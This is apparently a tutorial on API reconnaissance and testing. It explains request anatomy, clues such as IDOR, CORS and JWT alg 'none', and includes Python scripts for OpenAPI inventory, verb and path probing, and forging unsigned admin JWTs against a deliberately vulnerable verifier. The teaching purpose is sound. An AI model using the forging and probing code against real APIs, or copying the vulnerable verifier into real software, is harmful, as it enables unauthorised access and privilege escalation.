
Think like a Developer: API Hacking

What Does an API Look Like? (Structure Breakdown)

A typical API request looks like this:

GET /v1/user/profile?id=0034 HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Content-Type: application/json

Here’s what each part is for and how to spot uniqueness:

  • Method (GET/POST)
    What it does: the action the API is taking.
    How to identify: the first word of the request line.
    Why it matters: GET = retrieve, POST = create, PUT = update, DELETE = remove.

  • Endpoint (/v1/...)
    What it does: names the resource being accessed.
    How to identify: the URL path that follows the method.
    Why it matters: shows version, resource and hierarchy.

  • Query params (?id=)
    What it does: filter or identify specific data.
    How to identify: after the ?, in key=value form.
    Why it matters: can be manipulated or tested for IDOR, SQLi, etc.

  • Host
    What it does: the server the API lives on.
    How to identify: usually api.domain.com.
    Why it matters: a subdomain is often used to separate API traffic.

  • Headers
    What it does: metadata such as auth, format and content type.
    How to identify: key: value pairs.
    Why it matters: auth headers = access control, content headers = data format.

  • Token (JWT/Bearer)
    What it does: authenticates the request.
    How to identify: Authorization: Bearer [token].
    Why it matters: can be intercepted, decoded, replayed or forged.

  • Payload (body)
    What it does: for POST/PUT, carries the data being sent.
    How to identify: JSON, XML or form data in the body.
    Why it matters: look for fields, input validation and hidden logic.

  • Status code (200, 403)
    What it does: the API's reply: success, failure or error.
    How to identify: returned in the response.
    Why it matters: helps detect broken auth, rate limiting or abuse.

Example: API Request & Response (Visual)

Request:

POST /v1/register HTTP/1.1
Host: api.coolapp.io
Authorization: Bearer eyJK...sTR1Ng
Content-Type: application/json

{
  "username": "Friza",
  "email": "friza@example.com",
  "password": "StrongPassword123"
}

Response:

{
  "success": true,
  "user_id": "U-998321",
  "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}

What’s unique?

  • /v1/register — tells you the API version and the function of the endpoint.

  • Bearer token — the Bearer scheme is how OAuth2 access tokens are sent. A token that starts with eyJ is base64url for {" and is almost certainly a JWT, which you can decode (but not verify) locally. Note that the response hands back a token too: that is the credential you will reuse on later requests.

  • Body fields — tell you what input is required, and which fields to probe for weak validation or extra, undocumented parameters the server might accept (for example a privilege field such as isAdmin).


⚔️ How to Identify a Vulnerable or Valuable API

Clue, and what it may reveal:

  • Publicly exposed Swagger docs: endpoint list, methods, schemas, often a built-in "try it out" console.

  • No rate limiting: open to brute force, credential stuffing, scraping and DoS.

  • Predictable IDs (user_id=12): test for IDOR (Insecure Direct Object Reference) by requesting a neighbouring ID with your own, lower-privileged token.

  • Endpoint answers without an Authorization header: an open endpoint, by design or by mistake.

  • Verbose error messages: leak application logic or stack-trace details.

  • JWT with "none" algorithm: if the server honours alg "none" it skips signature verification, so anyone can forge tokens. Confirm it by re-submitting a modified, unsigned token rather than assuming from the header alone.

  • CORS misconfigurations: reflecting any Origin together with Access-Control-Allow-Credentials: true lets a hostile site read authenticated responses.


APIs look like professional conversations between systems. The URL structure, method, headers, and response all give tells about security posture, logic flow, and access points, much as headers hint at which service or container is handling an operation. Apply some critical thinking and the question becomes: what has this API been trained to do? API reconnaissance (API enumeration) is key in both offensive testing and defensive hardening, because it reveals exactly what the API is trained to handle.

1. Endpoints

APIs are trained to perform specific tasks, and those tasks are exposed through endpoints. For example:

GET /api/v1/users
POST /api/v1/login
DELETE /api/v1/user/1345

Each endpoint tells you:

  • What action it's trained to handle

  • Which data it's designed to expose, modify or delete

  • How sensitive the logic or content might be (e.g. /delete, /admin, /payments)

2. Swagger / OpenAPI / Postman Collections

If you can find a file like:

  • /swagger.json

  • /openapi.yaml

  • /docs

  • /api-docs

You're basically seeing the API’s instruction manual. These docs lay out:

  • What functions it was trained to provide

  • What data it takes in and gives out

  • What verbs (GET, POST, DELETE) it accepts

  • Any authentication mechanisms it expects
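To show what reading that instruction manual looks like in practice, here is an added example (not code from the original post) that walks an OpenAPI 3 document and pulls out the recon facts listed above: which verbs each path accepts, which operations need no auth, which carry object IDs in the path (IDOR candidates) and which request bodies expose privilege fields. The spec embedded in the script is a constructed, hypothetical sample; its paths, scheme name and fields are not from any real API.

```python
"""Build an endpoint inventory from an OpenAPI document.

Added example for this post, not code from the original page. The spec
below is a constructed sample: its paths, scheme name and fields are
hypothetical, chosen to show what the walk over paths -> operations ->
security tells you during recon.
"""
import json
from typing import Dict, List

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "options", "head"}
SENSITIVE_HINTS = ("admin", "delete", "payment", "upload", "password", "reset")
PRIVILEGE_FIELDS = ("role", "isadmin", "is_admin", "admin")

# Constructed OpenAPI 3.x document (hypothetical API, not a real host).
SAMPLE_SPEC = json.loads("""
{
  "openapi": "3.0.0",
  "security": [{"bearerAuth": []}],
  "components": {"securitySchemes": {"bearerAuth":
      {"type": "http", "scheme": "bearer", "bearerFormat": "JWT"}}},
  "paths": {
    "/v1/register": {"post": {"security": [], "requestBody": {"content":
        {"application/json": {"schema": {"properties":
        {"username": {}, "email": {}, "password": {}, "role": {}}}}}}}},
    "/v1/user/{id}": {"get": {"parameters": [{"name": "id", "in": "path"}]},
                      "delete": {"parameters": [{"name": "id", "in": "path"}]}},
    "/v1/admin/users": {"get": {}},
    "/v1/health": {"get": {"security": []}}
  }
}
""")


def inventory(spec: dict) -> List[Dict]:
    """One row per (method, path) with the recon-relevant facts pulled out."""
    default_security = spec.get("security", [])
    rows = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # skip "parameters", "summary", vendor extensions
            # An operation-level "security" overrides the document default;
            # an explicit empty list means the operation needs no auth at all.
            security = op.get("security", default_security)
            body_fields: List[str] = []
            for media in op.get("requestBody", {}).get("content", {}).values():
                body_fields.extend(media.get("schema", {}).get("properties", {}))
            path_params = [p["name"] for p in op.get("parameters", [])
                           if p.get("in") == "path"]
            rows.append({
                "method": method.upper(),
                "path": path,
                "auth_required": bool(security),
                "path_params": path_params,
                "body_fields": body_fields,
                # Verbs and path words that mark high-impact logic.
                "sensitive": method.lower() == "delete"
                             or any(h in path.lower() for h in SENSITIVE_HINTS),
                # Client-settable privilege fields: mass-assignment candidates.
                "privilege_fields": [f for f in body_fields
                                     if f.lower() in PRIVILEGE_FIELDS],
            })
    return rows


def unauthenticated(rows: List[Dict]) -> List[Dict]:
    """Operations the spec says need no credentials at all."""
    return [r for r in rows if not r["auth_required"]]


def idor_candidates(rows: List[Dict]) -> List[Dict]:
    """Object IDs in the path are where you test access with another user's token."""
    return [r for r in rows if r["path_params"]]


if __name__ == "__main__":
    for r in inventory(SAMPLE_SPEC):
        flags = []
        if not r["auth_required"]:
            flags.append("NO-AUTH")
        if r["sensitive"]:
            flags.append("SENSITIVE")
        if r["privilege_fields"]:
            flags.append("MASS-ASSIGN?:" + ",".join(r["privilege_fields"]))
        print(f'{r["method"]:6} {r["path"]:18} {" ".join(flags)}')
```

Point the script at a real /swagger.json or /openapi.yaml (parse YAML with a YAML library first) and the same walk applies; the thing to check by hand afterwards is whether the server actually enforces what the spec declares, because documentation and enforcement drift apart.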

3. Passive Clues from Headers & Responses

Even if the API isn’t fully documented, you can watch how it reacts.

For example:

  • Send a GET to a path you haven't seen documented.

  • See what comes back:
    405 Method Not Allowed → it knows the path, just not this verb (the Allow header often lists the verbs it does accept).
    401 Unauthorized → it’s expecting a token (the WWW-Authenticate header tells you the scheme).
    403 Forbidden → it recognised you, but your identity isn't permitted here.
    404 Not Found → it wasn’t trained on this path. Caveat: some APIs return 404 instead of 401/403 to hide resources you aren't allowed to see, so compare responses with and without a valid token before concluding a path doesn't exist.

These are tells. Like a dog trained for guarding that reacts to a stranger but not to its owner, the API gives away what it's used to handling.
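The probing described above, as an added example (not code from the original post): try several verbs on each candidate path, turn the status code and qualifying headers into a tell, and collect the paths that turned out to exist. probe() uses urllib for real requests; for an offline run it is handed fake_api(), a constructed stand-in server with hypothetical paths, and api.example.test is a hypothetical host.

```python
"""Read an API's tells from its responses to unknown paths and verbs.

Added example for this post, not code from the original page. probe() sends
real requests through urllib by default; fake_api() is a constructed stand-in
server (hypothetical paths) so the demo runs offline, and api.example.test
is a hypothetical host.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

Response = Tuple[int, Dict[str, str]]          # (status, lower-cased headers)
Sender = Callable[[str, str], Response]


def http_send(url: str, method: str) -> Response:
    """Real transport: return status and headers, treating 4xx/5xx as data."""
    req = urllib.request.Request(url, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}


def classify(status: int, headers: Dict[str, str]) -> str:
    """Translate a status (plus the headers that qualify it) into a tell."""
    if status == 404:
        return "unknown path"
    if status == 405:
        return f"path exists, verb not allowed (Allow: {headers.get('allow', '?')})"
    if status == 401:
        return f"path exists, expects credentials ({headers.get('www-authenticate', '?')})"
    if status == 403:
        return "path exists, identity recognised but not permitted"
    if status == 429:
        return "rate limited"
    if 200 <= status < 300:
        return "open (no auth needed)"
    return f"other ({status})"


def probe(base_url: str, paths: Iterable[str],
          methods: Iterable[str] = ("GET", "POST", "DELETE"),
          send: Sender = http_send) -> Dict[Tuple[str, str], str]:
    """Try every verb on every path and record the classified tell."""
    results = {}
    for path in paths:
        for method in methods:
            status, headers = send(base_url.rstrip("/") + path, method)
            results[(method, path)] = classify(status, headers)
    return results


def known_paths(results: Dict[Tuple[str, str], str]) -> set:
    """Paths that produced anything other than 404 for at least one verb."""
    return {path for (_, path), tell in results.items() if tell != "unknown path"}


def fake_api(url: str, method: str) -> Response:
    """Constructed stand-in for a server, mimicking the classic tells."""
    parts = url.split("/", 3)
    path = "/" + parts[3] if len(parts) > 3 else "/"
    if path == "/api/v1/login":                      # POST-only endpoint
        return (200, {}) if method == "POST" else (405, {"allow": "POST"})
    if path == "/api/v1/users":                      # needs a bearer token
        return 401, {"www-authenticate": "Bearer"}
    if path == "/api/v1/health":                     # public, GET-only
        return (200, {}) if method == "GET" else (405, {"allow": "GET"})
    return 404, {}


if __name__ == "__main__":
    demo = probe("http://api.example.test",
                 ["/api/v1/users", "/api/v1/login", "/api/v1/secret"],
                 send=fake_api)
    for (method, path), tell in demo.items():
        print(f"{method:6} {path:16} -> {tell}")
    print("paths that exist:", sorted(known_paths(demo)))
```

Run it against a real target by dropping the send=fake_api argument; keep the verb list small and the rate low on systems you are authorised to test, since a DELETE on a path that turns out to be open is not a passive check.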

4. Test for Behavior via Fuzzing or Mapping

You can fuzz or map to discover hidden behavior:

  • Use tools like:

    • ffuf to brute force endpoint paths

    • Burp Suite or Postman to send crafted requests

    • jwt.io to decode tokens and see user roles (on a real engagement decode locally instead; pasting a live token into a third-party site hands that site the credential)

If it accepts a certain pattern, it's trained to understand it. If it fails or leaks info, it's trained but poorly.
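Decoding a token locally, and the "none" algorithm clue from the table above, in one added example (not code from the original post, standard library only): the script mints a legitimate HS256 token, decodes it the way jwt.io would, forges an alg "none" token with an admin role, and shows a deliberately vulnerable verifier accepting the forgery next to a hardened one rejecting it. SECRET, the claims and the user ID are constructed for the demo.

```python
"""Decode a JWT locally and show why accepting alg "none" is fatal.

Added example for this post, not code from the original page; standard
library only. SECRET, the claims and the tokens are all constructed for the
demo, and verify_naive() is deliberately vulnerable to contrast with
verify_strict().
"""
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

SECRET = b"demo-secret-not-for-production"   # constructed signing key


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT parts drop the '=' padding; put it back before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """What jwt.io shows you: header and claims, with no signature check."""
    header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a legitimate HS256 token, the way the server would."""
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none(payload: dict) -> str:
    """Attacker side: claims of our choosing, alg "none", empty signature."""
    return encode_part({"alg": "none", "typ": "JWT"}) + "." + encode_part(payload) + "."


def hs256_ok(header_b64: str, payload_b64: str, sig_b64: str, secret: bytes) -> bool:
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return bool(sig_b64) and hmac.compare_digest(expected, b64url_decode(sig_b64))


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """VULNERABLE: trusts the alg named in the token's own header."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":          # attacker-controlled switch
        return json.loads(b64url_decode(p))  # signature never checked
    if header.get("alg") == "HS256" and hs256_ok(h, p, s, secret):
        return json.loads(b64url_decode(p))
    return None


def verify_strict(token: str, secret: bytes) -> Optional[dict]:
    """HARDENED: the algorithm is pinned server-side; the header must agree."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256" or not hs256_ok(h, p, s, secret):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    legit = sign_hs256({"sub": "U-998321", "role": "user"}, SECRET)
    print("prefix:", legit[:3], "-> base64url of '{\"', the JWT giveaway")
    print("decoded without verifying:", decode_unverified(legit))
    forged = forge_none({"sub": "U-998321", "role": "admin"})
    print("naive verifier accepts forged token:", verify_naive(forged, SECRET))
    print("strict verifier rejects it:", verify_strict(forged, SECRET))
```

The same pinned-algorithm rule is what a real JWT library's allow-list of algorithms enforces; when testing a target, the equivalent of forge_none() is to take a captured token, change the header to alg "none", edit the claims, strip the signature and re-submit it. If the API still honours the claims, you have confirmed the clue rather than guessed at it.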

5. Training = Logic = Attack Surface

If an API was trained to:

  • Accept password resets (/forgot-password)

  • Perform file uploads (/upload)

  • Handle role-based logic (/admin, isAdmin: true)

That tells you the risk zones and attack points.


Conclusion

Have a nice day!
